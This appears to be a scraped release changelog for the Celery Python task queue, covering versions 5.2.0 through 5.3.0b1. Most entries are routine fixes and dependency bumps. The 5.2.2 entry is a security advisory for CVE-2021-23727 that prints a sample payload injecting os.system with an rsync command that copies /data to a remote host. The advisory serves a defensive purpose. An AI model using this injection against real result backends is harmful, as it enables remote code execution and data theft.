All Versions
Latest Version
Avg Release Cycle
28 days
Latest Release

Changelog History
Page 1

  • v5.3.0.b1 Changes

    ๐Ÿš€ :release-date: 2022-08-01 5:15 P.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • Canvas Header Stamping (#7384).
    • async chords should pass it's kwargs to the group/body.
    • beat: Suppress banner output with the quiet option (#7608).
    • ๐Ÿ›  Fix honor Django's TIME_ZONE setting.
    • Don't warn about DEBUG=True for Django.
    • Fixed the on_after_finalize cannot access tasks due to deadlock.
    • โฌ†๏ธ Bump kombu>=5.3.0b1,<6.0.
    • ๐Ÿ”ง Make default worker state limits configurable (#7609).
    • Only clear the cache if there are no active writers.
    • Billiard 4.0.1

    .. _version-5.3.0a1:

  • v5.3.0.a1 Changes

    ๐Ÿš€ :release-date: 2022-06-29 5:15 P.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • โœ‚ Remove Python 3.4 compatibility code.
    • ๐Ÿ“œ call ping to set connection attr for avoiding redis parse_response error.
    • ๐Ÿ—„ Use importlib instead of deprecated pkg_resources.
    • ๐Ÿ›  fix #7245 uid duplicated in command params.
    • ๐Ÿ›  Fix subscribed_to maybe empty (#7232).
    • ๐Ÿ›  Fix: Celery beat sleeps 300 seconds sometimes even when it should run a task within a few seconds (e.g. 13 seconds) #7290.
    • Add security_key_password option (#7292).
    • ๐Ÿ‘ Limit elasticsearch support to below version 8.0.
    • ๐Ÿš€ try new major release of pytest 7 (#7330).
    • broker_connection_retry should no longer apply on startup (#7300).
    • Remove ne methods (#7257).
    • ๐Ÿ›  fix #7200 uid and gid.
    • โœ‚ Remove exception-throwing from the signal handler.
    • โž• Add mypy to the pipeline (#7383).
    • ๐Ÿ”ฆ Expose more debugging information when receiving unknown tasks. (#7405)
    • ๐Ÿšš Avoid importing buf_t from billiard's compat module as it was removed.
    • Avoid negating a constant in a loop. (#7443)
    • Ensure expiration is of float type when migrating tasks (#7385).
    • load_extension_class_names - correct module_name (#7406)
    • โฌ†๏ธ Bump pymongo[srv]>=4.0.2.
    • Use inspect.getgeneratorstate in asynpool.gen_not_started (#7476).
    • ๐Ÿ›  Fix test with missing .get() (#7479).
    • azure-storage-blob>=12.11.0
    • ๐Ÿ‘ท Make start_worker, setup_default_app reusable outside of pytest.
    • Ensure a proper error message is raised when id for key is empty (#7447).
    • Crontab string representation does not match UNIX crontab expression.
    • ๐Ÿ‘ท Worker should exit with ctx.exit to get the right exitcode for non-zero.
    • ๐Ÿ›  Fix expiration check (#7552).
    • ๐Ÿ‘‰ Use callable built-in.
    • Include dont_autoretry_for option in tasks. (#7556)
    • ๐Ÿ›  fix: Syntax error in arango query.
    • ๐Ÿ›  Fix custom headers propagation on task retries (#7555).
    • โš  Silence backend warning when eager results are stored.
    • โฌ‡๏ธ Reduce prefetch count on restart and gradually restore it (#7350).
    • ๐Ÿ‘Œ Improve workflow primitive subclassing (#7593).
    • โœ… test kombu>=5.3.0a1,<6.0 (#7598).
    • Canvas Header Stamping (#7384).

    .. _version-5.2.7:

  • v5.2.7 Changes

    ๐Ÿš€ :release-date: 2022-5-26 12:15 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ›  Fix packaging issue which causes poetry 1.2b1 and above to fail install Celery (#7534).

    .. _version-5.2.6:

  • v5.2.6 Changes

    ๐Ÿš€ :release-date: 2022-4-04 21:15 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    • load_extension_class_names - correct module_name (#7433). This fixes a regression caused by #7218.

    .. _version-5.2.5:

  • v5.2.5 Changes

    ๐Ÿš€ :release-date: 2022-4-03 20:42 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    ๐Ÿš€ This release was yanked due to a regression caused by the PR below

    • ๐Ÿ—„ Use importlib instead of deprecated pkg_resources (#7218).

    .. _version-5.2.4:

  • v5.2.4 Changes

    ๐Ÿš€ :release-date: 2022-4-03 20:30 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ”ฆ Expose more debugging information when receiving unknown tasks (#7404).

    .. _version-5.2.3:

  • v5.2.3 Changes

    ๐Ÿš€ :release-date: 2021-12-29 12:00 P.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • ๐Ÿ‘ Allow redis >= 4.0.2.
    • โฌ†๏ธ Upgrade minimum required pymongo version to 3.11.1.
    • โœ… tested pypy3.8 beta (#6998).
    • Split Signature.or into subclasses' or (#7135).
    • Prevent duplication in event loop on Consumer restart.
    • Restrict setuptools>=59.1.1,<59.7.0.
    • Kombu bumped to v5.2.3
    • py-amqp bumped to v5.0.9
    • ๐Ÿ‘ท Some docs & CI improvements.

    .. _version-5.2.2:

  • v5.2.2 Changes

    ๐Ÿš€ :release-date: 2021-12-26 16:30 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ“š Various documentation fixes.
    • ๐Ÿ›  Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

  • v5.2.1 Changes

    ๐Ÿš€ :release-date: 2021-11-16 8.55 P.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • ๐Ÿ›  Fix rstrip usage on bytes instance in ProxyLogger.
    • ๐ŸŒฒ Pass logfile to ExecStop in celery.service example systemd file.
    • ๐Ÿ›  fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • โฌ†๏ธ Bump min kombu version to 5.2.2.
    • ๐Ÿ”„ Change pytz>dev to a PEP 440 compliant pytz>
    • โœ‚ Remove dependency to case (#7077).
    • ๐Ÿ›  fix: task expiration is timezone aware if needed (#7065).
    • ๐ŸŽ‰ Initial testing of pypy-3.8 beta to CI.
    • ๐Ÿ“„ Docs, CI & tests cleanups.

    .. _version-5.2.0:

  • v5.2.0 Changes

    ๐Ÿš€ :release-date: 2021-11-08 7.15 A.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • Prevent from subscribing to empty channels (#7040)
    • ๐Ÿ›  fix register_task method.
    • ๐Ÿšฆ Fire task failure signal on final reject (#6980)
    • Limit pymongo version: <3.12.1 (#7041)
    • โฌ†๏ธ Bump min kombu version to 5.2.1

    .. _version-5.2.0rc2: